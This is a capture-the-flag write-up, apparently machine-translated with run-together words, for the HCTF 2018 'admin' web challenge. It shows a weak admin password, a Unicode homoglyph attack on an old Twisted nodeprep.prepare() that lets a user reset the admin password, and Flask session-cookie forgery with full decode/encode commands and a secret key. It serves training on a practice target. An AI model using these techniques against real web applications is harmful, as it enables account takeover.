Subject address: https://buuoj.cn/challenges#[HCTF%202018]admin
The first solution: weak password
When prompted, try a weak password to log adminthe user when adminthe password is 123, the successful landing
The second solution: Unicode spoofing.
Register a user mochu7at random and Change Password
give the source code of the title in/hctf_flask/app/rotus.py
registerAnd loginused a custom function for the usernamestrlower()
nodeprep.prepare()From
from twisted.words.protocols.jabber.xmpp_stringprep import nodeprep
In requirements.txtcan be seen in Twistedthe version
TwistedVersion 10.2.0, and the current (2020/10/28) TwistedThe latest version has been 20.3.0used here in a very old version
10.2.0version nodeprep.prepare()of the special Unicodepost-encoding process will get a normal character
, use the following website to find adminspecial account Unicodecoding
https: // unicode-table.com/en/search/?q=Modifier+Letter+Capital
ᴬᴰᴹᴵᴺ
UnicodeAfter encoding
\u1d2c\u1d30\u1d39\u1d35\u1d3a
Characters nodeprep.prepare()obtained after two processingadmin
You can register an account ᴬᴰᴹᴵᴺ, and you can nodeprep.prepare()get it once when you register ADMIN, and then when nodeprep.prepare()you change your password, it will be processed a second time, and adminyou can modify your adminaccount password when you get it.
The third solution: forged Flask session
As we all know, flaskthe sessionis stored in the client's cookieamong, and there is no encryption, just do a signature to prevent tampering
User mochu7'ssession
{
'_fresh': True, '_id': b'cbf743351a54bf3ded8ca2343c8479d60da235568a066582dc7814a5864c10618d87e3a13f7d37e6464470248ebd3233603c6d5e3597d2cf2c04b073d4518c53', 'csrf_token': b'7584ce1b2f1bd3155835e20862bc752607b31c7b', 'image': b'LqRX', 'name': 'mochu7', 'user_id': '10'}
PS D:\Tools\Web\flask-session-cookie-manager> python .\flask_session_cookie_manager3.py decode -s 'ckj123' -c '.eJw9kMGKwkAQRH9l6bOHZOKyEPAQGM0a6A66o2HmIm6MTjqJQlQ0I_77Di54rup61fWAzb6vzhbiS3-tRrCpdxA_4OMXYtAi68gtHLrVXatVoDvtTLpu8pQsMgYocEyy_DRS30w6HbwvJLYWpRakDoNJMcrlNPC3Y-Ilo0oEKtvkcteimN5R6MhIjIzSAfEiIJcMJG2rO89kdMSJ88SGipUj1XhvxoYzRrmsUZbOyEXo85gUTuA5gvLc7zeXU1Md3y-Q8-iUWizmg-FZ7XF38nXQrVvkxNfKau3KEFnfSMwdFhjpw-QVV3fbQ_VOUt-znyL5V47bzgvQnUp7_YIRXM9V_xoOwgCef1nZbOI.X5k9pg.ErECKkJ7jz7qU_-NGQSWFDgTq98'
{
'_fresh': True, '_id': b'cbf743351a54bf3ded8ca2343c8479d60da235568a066582dc7814a5864c10618d87e3a13f7d37e6464470248ebd3233603c6d5e3597d2cf2c04b073d4518c53', 'csrf_token': b'7584ce1b2f1bd3155835e20862bc752607b31c7b', 'image': b'LqRX', 'name': 'mochu7', 'user_id': '10'}
Forgery sessionalso needs to know secret key, you can find it by searching the source code folder globally
secret keyforckj123
Amended nametoadmin
{
'_fresh': True, '_id': b'cbf743351a54bf3ded8ca2343c8479d60da235568a066582dc7814a5864c10618d87e3a13f7d37e6464470248ebd3233603c6d5e3597d2cf2c04b073d4518c53', 'csrf_token': b'7584ce1b2f1bd3155835e20862bc752607b31c7b', 'image': b'LqRX', 'name': 'admin', 'user_id': '10'}
Encrypting get adminthesession
PS D:\Tools\Web\flask-session-cookie-manager> python .\flask_session_cookie_manager3.py encode -s 'ckj123' -t "{'_fresh': True, '_id': b'cbf743351a54bf3ded8ca2343c8479d60da235568a066582dc7814a5864c10618d87e3a13f7d37e6464470248ebd3233603c6d5e3597d2cf2c04b073d4518c53', 'csrf_token': b'7584ce1b2f1bd3155835e20862bc752607b31c7b', 'image': b'LqRX', 'name': 'admin', 'user_id': '10'}"
.eJw9kMGKwkAQRH9l6bOHZOJeBA-B0ayBbtEdDTOX4MZo0klciIqmxX_fwQXPVV2vuh6QH_ryXMHk0l_LEeT1HiYP-PiBCViVdiQrQdncrdkEtrPikm2zTKhCxgAVjkkXn07bm0tmg_eFxFWF2ioyx8ElGC31LPC3Y-I1o4kVmqpZ6n2LanZHZSOnMXLGBsSrgCQeSFet7TyTUYhj8cSGso2Qabw3Zccpo17XqAtxehX6PCaDU3iOoDj3h_zy25Sn9wskHp1Qi9licDyvPe5Ovg7KtkWOfa20tlKEyPZGaiGYYWSP01dc3e2O5TvJfM2_s_hfOe06L8Bu39UnGMH1XPav3SAM4PkH7IhsmA.X5k-3w.1NeZXj_XVt-fu-MQxsTtdPuBZws
